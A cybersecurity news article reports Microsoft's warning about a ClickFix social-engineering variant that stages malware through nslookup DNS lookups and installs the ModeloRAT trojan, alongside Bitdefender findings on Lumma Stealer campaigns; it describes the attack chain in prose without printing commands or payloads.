Microsoft Warns Hackers Are Using Nslookup DNS Lookups to Deliver ClickFix Malware

Microsoft has revealed a dangerous new evolution of the ClickFix social engineering tactic, with the DNS-based ClickFix attack replacing traditional web-based malware delivery with something far harder to spot: Domain Name System (DNS) lookups.

In this newly observed variant, attackers trick victims into running a command through the Windows Run dialog that uses nslookup, a legitimate Windows networking tool, to retrieve a hidden second-stage payload.

The approach allows cybercriminals to stage malware through DNS traffic, blending malicious activity into what most systems treat as normal internet behavior.

This development highlights how attackers are increasingly relying on human trust and procedural deception, rather than exploiting technical vulnerabilities.

What Is ClickFix and Why Is It Spreading So Fast?

ClickFix has become one of the most effective social engineering techniques of the last two years. Instead of breaking into systems directly, attackers convince users to infect themselves.

The tactic typically begins with:

• Fake CAPTCHA verification pages
• Bogus error messages
• “Fix your PC” instructions
• Malvertising redirects or phishing links
• Victims are told to run a command in:
• Windows Run dialog
• Command Prompt
• macOS Terminal

Once executed, the command pulls down malware, often bypassing security tools because the user is effectively authorizing the action.

ClickFix has also inspired multiple offshoots, including:

• FileFix
• ConsentFix
• CrashFix
• GlitchFix
• JackFix

Microsoft’s New Warning: DNS-Based Malware Staging via Nslookup

Microsoft Threat Intelligence says the latest ClickFix variant introduces a stealthier delivery mechanism. Instead of contacting a malicious website directly, the attack uses:

• exe
• A custom nslookup command
• A hard-coded external DNS server

The DNS response is then filtered to extract the “Name:” field, which becomes the next-stage payload. In simple terms:

The malware is hidden inside DNS lookups, not downloads.

Microsoft described DNS here as a “lightweight staging or signaling channel,” allowing attackers to validate victims before execution, avoid traditional web traffic detection and blend into everyday network behavior

This marks a significant shift in how malware loaders are being deployed.

Attack Chain: From DNS Lookup to Remote Access Trojan

Once the second-stage payload is triggered, the infection expands quickly. Microsoft says the chain eventually leads to the download of a ZIP archive from an external domain: azwsappdev[.]com

Inside the archive:

• A malicious Python script is extracted
• Reconnaissance and discovery commands run
• A VBScript launcher is dropped
• The malware installs ModeloRAT, a Python-based remote access trojan

ModeloRAT enables attackers to:

• Spy on infected systems
• Steal data
• Execute remote commands
• Maintain persistent access

How Persistence Is Achieved

To ensure the malware survives reboots, attackers create a Windows shortcut file placed inside the Startup folder, pointing directly to the VBScript launcher. That means every time the PC starts, the malware starts too, without further user interaction.

Bitdefender Links ClickFix Surge to Lumma Stealer Campaigns

Microsoft’s disclosure comes alongside a major warning from Bitdefender, which reports a spike in Lumma Stealer activity. These campaigns use ClickFix-style fake CAPTCHA pages to deploy:

• CastleLoader (AutoIt-based malware loader)
• CastleLoader is particularly dangerous because it checks for:
• Virtual machines
• Security software
• Sandbox environments

Only then does it decrypt and launch the stealer malware directly in memory. Attackers are also using bait such as cracked software downloads, pirated movie sites, fake MP4 executables and rogue NSIS installers. Even after law enforcement disruption efforts in 2025, Lumma Stealer operations have continued by rapidly shifting infrastructure.

The Bigger Picture: Trust Is the New Attack Surface

Security researchers say ClickFix works because it exploits something deeper than code: procedural trust.

The commands look like troubleshooting steps users may have seen before, making the deception feel routine rather than suspicious.

As attackers increasingly hide malware inside DNS traffic, cracked software ads, and even trusted AI-sharing platforms, the line between legitimate and malicious activity is becoming harder to detect. The next generation of cyberattacks won’t always “hack” systems; they will persuade users to open the door themselves.